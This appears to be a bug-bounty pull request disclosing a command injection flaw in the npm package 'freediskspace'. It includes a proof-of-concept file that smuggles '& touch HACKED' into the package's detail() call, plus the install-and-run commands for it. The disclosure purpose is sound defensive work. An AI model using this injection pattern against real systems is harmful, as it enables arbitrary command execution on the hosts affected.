### PR TITLE
Add FreeDiskSpace

### DIFF
--- a/bounties/npm/freediskspace/1/README.md
+++ b/bounties/npm/freediskspace/1/README.md
@@ -1,0 +1,23 @@
+# Overview
+
+The issue occurs because a `user input` is formatted inside a `detail` that will be executed without any check.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+var a = require("freediskspace");
+a.detail("& touch HACKED",function(){})
+```
+
+1. Check there aren't files called `HACKED`
+1. Execute the following commands in another terminal:
+
+```bash
+npm i freediskspace # Install affected module
+node poc.js #  Run the PoC
+```
+
+1. Recheck the files: now `HACKED` has been created :)

--- a/bounties/npm/freediskspace/1/vulnerability.json
+++ b/bounties/npm/freediskspace/1/vulnerability.json
@@ -1,0 +1,56 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2021-02-07",
+    "AffectedVersionRange": "*",
+    "Summary": "Command Injection",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "freediskspace",
+        "URL": "https://www.npmjs.com/package/freediskspace",
+        "Downloads": "16"
+    },
+    "CWEs": [
+        {
+            "ID": "77",
+            "Description": "Improper Neutralization of Special Elements used in a Command ('Command Injection')"
+        }
+    ],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "7.3"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/palortoff/freediskspace",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "palortoff",
+        "Name": "freediskspace",
+        "Forks": "1",
+        "Stars": "3"
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [],
+    "PrNumber": "1840",
+    "FixSubmissionCount": 1
+}


### PR DESCRIPTION
# Overview

The issue occurs because a `user input` is formatted inside a `detail` that will be executed without any check.

# Proof of Concept

1. Create the following PoC file:

```js
// poc.js
var a = require("freediskspace");
a.detail("& touch HACKED",function(){})
```

1. Check there aren't files called `HACKED`
1. Execute the following commands in another terminal:

```bash
npm i freediskspace # Install affected module
node poc.js #  Run the PoC
```


## 💥 Impact

You can execute arbitrary commands

## ☎️ Contact

No

## ✅ Checklist

<!-- Please put an `x` in each box to confirm you have completed the checklist. -->

**In my pull request, I have:**

- [X] _Created and populated the `README.md` and `vulnerability.json` files_
- [X] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [X] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [X] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [X] _Checked that the vulnerability affects the latest version of the package released_
- [X] _Checked that a fix does not currently exist that remediates this vulnerability_
- [X] _Complied with all applicable laws_